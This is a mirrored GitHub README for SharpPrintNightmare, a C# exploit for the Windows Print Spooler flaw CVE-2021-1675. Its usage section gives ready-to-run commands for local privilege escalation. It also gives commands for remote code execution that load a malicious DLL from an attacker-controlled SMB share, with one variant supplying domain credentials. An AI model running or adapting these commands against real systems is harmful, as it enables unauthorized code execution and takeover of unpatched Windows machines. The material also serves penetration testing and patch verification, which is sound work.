1
0
Fork 0
mirror of https://github.com/cube0x0/CVE-2021-1675.git synced 2024-11-14 18:17:54 +00:00
CVE-2021-1675/SharpPrintNightmare/README.md

23 lines
734 B
Markdown
Raw Normal View History

# C# LPE Implementation of CVE-2021-1675
### Usage
```
#LPE
C:\SharpPrintNightmare.exe C:\addCube.dll
#RCE using existing context
SharpPrintNightmare.exe '\\192.168.1.215\smb\addCube.dll' 'C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_addb31f9bff9e936\Amd64\UNIDRV.DLL' '\\192.168.1.20'
#RCE using runas /netonly
SharpPrintNightmare.exe '\\192.168.1.215\smb\addCube.dll' 'C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_83aa9aebf5dffc96\Amd64\UNIDRV.DLL' '\\192.168.1.10' hackit.local domain_user Pass123
```
![](../Images/poc4.png)
![](../Images/poc3.png)
2021-07-02 00:13:30 +00:00
#### Acknowledgements
For new ideas or exploit improvements, thanks to
* [kiqrx](https://www.hackthebox.eu/home/users/profile/72916)